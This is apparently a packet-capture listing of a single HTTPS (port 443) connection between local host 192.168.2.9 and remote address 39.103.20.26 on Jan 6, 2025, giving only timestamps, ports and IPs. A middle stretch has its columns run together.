Jan 6, 2025 04:43:36.855978012 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.855992079 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.855995893 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.855999947 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.856034040 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.856060028 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.856077909 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.856121063 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.856177092 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.856225014 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.856277943 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.856328964 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992191076 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992249012 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992259979 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992270947 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992283106 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992335081 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992340088 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992367983 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992429018 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992433071 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992470980 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992505074 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992548943 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992644072 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992690086 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.992801905 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.992846966 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993048906 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993098974 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993146896 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993200064 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993233919 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993277073 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993318081 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993362904 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993385077 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993427038 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993486881 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993513107 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993531942 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993535042 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993547916 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993568897 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993660927 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993705988 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993746996 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993787050 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993861914 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993899107 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993913889 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993918896 CET   443          49978      39.103.20.26  192.168.2.9
Jan 6, 2025 04:43:36.993946075 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.993951082 CET   49978        443        192.168.2.9   39.103.20.26
Jan 6, 2025 04:43:36.994060993 CET   443          49978      39.103.20.26  192.168.2.9
                                                    Jan 6, 2025 04:43:36.994096041 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994155884 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994200945 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994277954 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994312048 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994327068 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994330883 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994347095 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994349957 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994365931 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994369030 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994390011 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994421959 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994575977 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994617939 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.994777918 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.994822979 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.995001078 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.995047092 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.995290995 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.995332003 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.995342016 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.995383978 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.995675087 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.995718002 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.995757103 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.995804071 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.996031046 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.996083021 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:36.996182919 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:36.996227026 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.082763910 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.082796097 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.082825899 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.082849979 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.082855940 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.082890987 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.082910061 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083023071 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083085060 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083122015 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083161116 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083163977 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083170891 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083199024 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083215952 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083410978 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083465099 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083513021 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083599091 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083609104 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083652973 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083739996 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.083797932 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.083967924 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084027052 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084095955 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084156990 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084177971 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084208012 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084218025 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084220886 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084284067 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084284067 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084335089 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084382057 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084423065 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084474087 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084531069 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084556103 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084597111 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084597111 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084603071 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084678888 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084748983 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084774017 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084794998 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084800005 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084820032 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084837914 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084933996 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084968090 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084978104 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.084983110 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.084994078 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085016966 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085021973 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085026026 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085062981 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085177898 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085227013 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085371971 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085417032 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085438013 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085495949 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085921049 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085956097 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.085975885 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.085979939 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086004972 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086019039 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086333990 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086386919 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086421013 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086502075 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086538076 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086581945 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086662054 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086746931 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086793900 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086838007 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.086927891 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.086975098 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.173970938 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174006939 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174035072 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174062967 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174067020 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174067020 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174078941 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174088955 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174088955 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174129009 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174138069 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174154997 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174176931 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174276114 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174336910 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174438953 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174484968 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174668074 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174715996 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174783945 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174830914 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174833059 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174839973 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174884081 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.174943924 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.174978018 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175002098 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175004959 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175026894 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175045013 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175118923 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175203085 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175209045 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175213099 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175237894 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175251007 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175424099 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175476074 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175482035 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175486088 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175502062 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175512075 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175515890 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175529003 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175534010 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175550938 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175554037 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175576925 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175586939 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175596952 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175600052 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175626993 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175774097 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175796986 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175817013 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175820112 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175837040 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175853968 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.175935984 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.175980091 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.176101923 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.176145077 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.176508904 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.176548004 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.176615953 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.176652908 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.176932096 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.176975012 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.177012920 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177052021 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.177187920 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177227020 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.177229881 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177238941 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177272081 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.177383900 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177427053 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.177567005 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.177607059 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265119076 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265156984 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265247107 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265259981 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265269995 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265438080 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265486956 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265491962 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265528917 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265590906 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265642881 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265755892 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265779018 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265805006 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265809059 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.265825987 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.265850067 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266089916 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266139030 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266252041 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266310930 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266613960 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266642094 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266660929 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266664982 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266688108 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266704082 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266829967 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266855955 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266875029 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266879082 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.266901970 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.266920090 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267103910 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267134905 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267158031 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267162085 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267182112 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267199993 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267297983 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267347097 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267436028 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267461061 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267482042 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:37.267486095 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:37.267508984 CET49978443192.168.2.939.103.20.26
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 6, 2025 04:43:37.267528057 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.267630100 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.267674923 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.267796040 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.267826080 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.267844915 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.267848969 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.267858028 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.267889977 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.267983913 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.268038034 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.268130064 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.268176079 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.268292904 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.268333912 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.268492937 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.268548965 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.268994093 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269022942 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269112110 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269117117 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269165039 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269486904 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269510984 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269531012 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269535065 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269550085 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269573927 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269644022 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269694090 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269819021 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269869089 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.269958019 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.269984961 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.270005941 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.270009995 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.270021915 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.270054102 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.290350914 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361324072 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361392021 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361501932 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361531019 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361555099 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361560106 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361572981 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361582041 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361627102 CET  49978        443        192.168.2.9    39.103.20.26
